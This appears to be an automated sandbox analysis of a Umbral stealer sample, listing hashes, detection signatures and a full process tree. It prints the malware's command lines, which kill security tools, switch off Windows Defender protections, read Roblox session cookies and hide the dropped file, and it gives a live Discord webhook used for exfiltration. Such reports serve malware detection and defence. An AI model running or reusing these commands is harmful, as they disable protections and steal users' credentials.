umbral | 63398bcbca8131165c25afdf5f04f3cebc5229828efa55d78f0bae7cc82a10f6

Analysis

max time kernel
6s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
24-02-2024 01:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BoostLoader_v1.exe
Size

28KB
MD5

4a68de0bacf7b13aaf73b50bfa30eefb
SHA1

448f7c54c470c1b88922a062984ebef021f86020
SHA256

63398bcbca8131165c25afdf5f04f3cebc5229828efa55d78f0bae7cc82a10f6
SHA512

a28d5a34fd486d205b77cdfec2c857a31510efd2535dfe228c7c8a2c9c797ee8fa531930963f18f6c4bb517a64f66728657461e952b17c8fe40796f252a6877e
SSDEEP

384:IbdmmHyX0F1bgqrSq6iKSLhgbcVNz3yy7dkw0yf1oIupWjW9Jf:GdfHyX0FlJOahiqdkwjtoI

Score

10^/10

umbral evasion stealer themida trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1210364331280040016/I1v11HzJ9503bqFhrXwnrML5qOk6sLEdbeU9uI-X_HnYuF3ipDXRAghmdJFNV9ySoE--

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/memory/2096-28-0x0000000000C50000-0x000000000128A000-memory.dmp	family_umbral
behavioral2/memory/2096-29-0x0000000000C50000-0x000000000128A000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	taskhostn.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	taskhostn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	taskhostn.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	BoostLoader_v1.exe

Executes dropped EXE 1 IoCs

pid	Process
2096	taskhostn.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x0006000000023210-9.dat	themida
behavioral2/memory/2096-28-0x0000000000C50000-0x000000000128A000-memory.dmp	themida
behavioral2/memory/2096-29-0x0000000000C50000-0x000000000128A000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	taskhostn.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
57	discord.com
58	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
54	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2096	taskhostn.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\taskhostn.exe	BoostLoader_v1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4588	wmic.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
2336	taskkill.exe
2856	taskkill.exe
5200	taskkill.exe
1880	taskkill.exe
2412	Process not Found
3592	Process not Found
5944	Process not Found
2612	taskkill.exe
5268	taskkill.exe
4304	Process not Found
3620	taskkill.exe
3672	taskkill.exe
1144	Process not Found
464	taskkill.exe
5644	taskkill.exe
6080	taskkill.exe
2284	taskkill.exe
2412	taskkill.exe
6068	taskkill.exe
3852	taskkill.exe
5632	Process not Found
4012	Process not Found
2780	Process not Found
4696	taskkill.exe
4384	taskkill.exe
5784	taskkill.exe
6084	Process not Found
4288	taskkill.exe
5176	taskkill.exe
2992	taskkill.exe
5420	taskkill.exe
4328	Process not Found
1500	Process not Found
5992	taskkill.exe
5896	taskkill.exe
2200	taskkill.exe
5476	taskkill.exe
6084	taskkill.exe
3024	taskkill.exe
5740	taskkill.exe
5964	taskkill.exe
6080	Process not Found
5848	taskkill.exe
5268	taskkill.exe
1996	taskkill.exe
4688	taskkill.exe
4692	taskkill.exe
5244	taskkill.exe
5960	Process not Found
716	Process not Found
5496	Process not Found
5352	Process not Found
1324	Process not Found
3468	taskkill.exe
1112	taskkill.exe
5292	taskkill.exe
3524	taskkill.exe
844	Process not Found
1856	Process not Found
2592	taskkill.exe
1756	Process not Found
1164	Process not Found
5516	taskkill.exe
3560	taskkill.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5384	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3620	taskmgr.exe
3620	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	4408	taskkill.exe
Token: SeDebugPrivilege	4504	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	3368	taskkill.exe
Token: SeDebugPrivilege	4816	taskkill.exe
Token: SeDebugPrivilege	2384	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	2076	taskkill.exe
Token: SeDebugPrivilege	2464	taskkill.exe
Token: SeDebugPrivilege	4620	taskkill.exe
Token: SeDebugPrivilege	4164	taskkill.exe
Token: SeDebugPrivilege	4444	Conhost.exe
Token: SeDebugPrivilege	3620	taskmgr.exe
Token: SeDebugPrivilege	2336	taskkill.exe
Token: SeDebugPrivilege	1632	Conhost.exe
Token: SeDebugPrivilege	4796	Conhost.exe
Token: SeDebugPrivilege	2372	svchost.exe
Token: SeDebugPrivilege	4440	Conhost.exe
Token: SeDebugPrivilege	728	Process not Found
Token: SeDebugPrivilege	4480	Process not Found
Token: SeDebugPrivilege	4088	Conhost.exe
Token: SeDebugPrivilege	2152	Process not Found
Token: SeDebugPrivilege	4084	taskkill.exe
Token: SeDebugPrivilege	4636	taskkill.exe
Token: SeDebugPrivilege	4288	taskkill.exe
Token: SeDebugPrivilege	2096	taskhostn.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	4916	Conhost.exe
Token: SeDebugPrivilege	3468	taskkill.exe
Token: SeDebugPrivilege	3620	taskmgr.exe
Token: SeSystemProfilePrivilege	3620	taskmgr.exe
Token: SeCreateGlobalPrivilege	3620	taskmgr.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	1036	Conhost.exe
Token: SeDebugPrivilege	3420	Process not Found
Token: SeDebugPrivilege	2792	Conhost.exe
Token: SeDebugPrivilege	2344	Conhost.exe
Token: SeDebugPrivilege	1120	taskkill.exe
Token: SeDebugPrivilege	2040	Process not Found
Token: SeDebugPrivilege	4932	Conhost.exe

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe
3620	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2604 wrote to memory of 4684	2604	BoostLoader_v1.exe	86
PID 2604 wrote to memory of 4684	2604	BoostLoader_v1.exe	86
PID 2604 wrote to memory of 4376	2604	BoostLoader_v1.exe	88
PID 2604 wrote to memory of 4376	2604	BoostLoader_v1.exe	88
PID 2604 wrote to memory of 4408	2604	BoostLoader_v1.exe	90
PID 2604 wrote to memory of 4408	2604	BoostLoader_v1.exe	90
PID 2604 wrote to memory of 1828	2604	BoostLoader_v1.exe	91
PID 2604 wrote to memory of 1828	2604	BoostLoader_v1.exe	91
PID 2604 wrote to memory of 4504	2604	BoostLoader_v1.exe	93
PID 2604 wrote to memory of 4504	2604	BoostLoader_v1.exe	93
PID 2604 wrote to memory of 4816	2604	BoostLoader_v1.exe	96
PID 2604 wrote to memory of 4816	2604	BoostLoader_v1.exe	96
PID 2604 wrote to memory of 3368	2604	BoostLoader_v1.exe	97
PID 2604 wrote to memory of 3368	2604	BoostLoader_v1.exe	97
PID 2604 wrote to memory of 2200	2604	BoostLoader_v1.exe	99
PID 2604 wrote to memory of 2200	2604	BoostLoader_v1.exe	99
PID 2604 wrote to memory of 2076	2604	BoostLoader_v1.exe	101
PID 2604 wrote to memory of 2076	2604	BoostLoader_v1.exe	101
PID 2604 wrote to memory of 2384	2604	BoostLoader_v1.exe	104
PID 2604 wrote to memory of 2384	2604	BoostLoader_v1.exe	104
PID 2604 wrote to memory of 2152	2604	BoostLoader_v1.exe	105
PID 2604 wrote to memory of 2152	2604	BoostLoader_v1.exe	105
PID 2604 wrote to memory of 2464	2604	BoostLoader_v1.exe	107
PID 2604 wrote to memory of 2464	2604	BoostLoader_v1.exe	107
PID 2604 wrote to memory of 4620	2604	BoostLoader_v1.exe	111
PID 2604 wrote to memory of 4620	2604	BoostLoader_v1.exe	111
PID 2604 wrote to memory of 2096	2604	BoostLoader_v1.exe	116
PID 2604 wrote to memory of 2096	2604	BoostLoader_v1.exe	116
PID 2604 wrote to memory of 2096	2604	BoostLoader_v1.exe	116
PID 2604 wrote to memory of 4444	2604	BoostLoader_v1.exe	346
PID 2604 wrote to memory of 4444	2604	BoostLoader_v1.exe	346
PID 2604 wrote to memory of 4164	2604	BoostLoader_v1.exe	119
PID 2604 wrote to memory of 4164	2604	BoostLoader_v1.exe	119
PID 2604 wrote to memory of 3620	2604	BoostLoader_v1.exe	163
PID 2604 wrote to memory of 3620	2604	BoostLoader_v1.exe	163
PID 2604 wrote to memory of 2336	2604	BoostLoader_v1.exe	324
PID 2604 wrote to memory of 2336	2604	BoostLoader_v1.exe	324
PID 2604 wrote to memory of 2372	2604	BoostLoader_v1.exe	189
PID 2604 wrote to memory of 2372	2604	BoostLoader_v1.exe	189
PID 2604 wrote to memory of 4796	2604	BoostLoader_v1.exe	327
PID 2604 wrote to memory of 4796	2604	BoostLoader_v1.exe	327
PID 2604 wrote to memory of 4440	2604	BoostLoader_v1.exe	228
PID 2604 wrote to memory of 4440	2604	BoostLoader_v1.exe	228
PID 2604 wrote to memory of 1632	2604	BoostLoader_v1.exe	523
PID 2604 wrote to memory of 1632	2604	BoostLoader_v1.exe	523
PID 2604 wrote to memory of 728	2604	BoostLoader_v1.exe	343
PID 2604 wrote to memory of 728	2604	BoostLoader_v1.exe	343
PID 2604 wrote to memory of 4480	2604	BoostLoader_v1.exe	599
PID 2604 wrote to memory of 4480	2604	BoostLoader_v1.exe	599
PID 2604 wrote to memory of 2152	2604	BoostLoader_v1.exe	137
PID 2604 wrote to memory of 2152	2604	BoostLoader_v1.exe	137
PID 2604 wrote to memory of 4088	2604	BoostLoader_v1.exe	291
PID 2604 wrote to memory of 4088	2604	BoostLoader_v1.exe	291
PID 2604 wrote to memory of 4084	2604	BoostLoader_v1.exe	276
PID 2604 wrote to memory of 4084	2604	BoostLoader_v1.exe	276
PID 2604 wrote to memory of 4636	2604	BoostLoader_v1.exe	381
PID 2604 wrote to memory of 4636	2604	BoostLoader_v1.exe	381
PID 2604 wrote to memory of 4288	2604	BoostLoader_v1.exe	146
PID 2604 wrote to memory of 4288	2604	BoostLoader_v1.exe	146
PID 2604 wrote to memory of 1812	2604	BoostLoader_v1.exe	781
PID 2604 wrote to memory of 1812	2604	BoostLoader_v1.exe	781
PID 2604 wrote to memory of 4916	2604	BoostLoader_v1.exe	190
PID 2604 wrote to memory of 4916	2604	BoostLoader_v1.exe	190
PID 2604 wrote to memory of 3468	2604	BoostLoader_v1.exe	308

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
8	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BoostLoader_v1.exe
"C:\Users\Admin\AppData\Local\Temp\BoostLoader_v1.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4376
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4408
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1828
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4504
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4816
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3368
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2076
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2152
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2464
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\taskhostn.exe
  "C:\Windows\taskhostn.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:2096
- - C:\Windows\SysWOW64\attrib.exe
    "attrib.exe" +h +s "C:\Windows\taskhostn.exe"
    3⤵
    - Views/modifies file attributes
    PID:8
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\taskhostn.exe'
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:3776
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:5808
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:5328
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:5496
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:5464
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:5248
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4588
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Windows\taskhostn.exe" && pause
    3⤵
    PID:2156
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:5384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4444
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Kills process with taskkill
  PID:3620
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:2372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4796
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:4440
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:728
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:4480
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2152
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2792
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4084
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4288
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4916
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  - Kills process with taskkill
  PID:3468
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:1880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1036
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:3420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2792
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:2344
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1120
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2040
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:748
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4764
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:1320
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:4636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3556
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4916
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:1520
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  - Kills process with taskkill
  PID:2592
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:464
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Kills process with taskkill
  PID:1112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:800
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:8
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:3264
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:3932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4508
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:2732
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2232
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1168
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2328
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4440
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4428
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4400
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4592
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2044
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:1936
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:1592
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:4780
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3488
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4808
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2756
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3868
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1224
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2184
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4364
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4232
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:2180
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1480
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:3560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:4384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4084
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1240
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:512
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4132
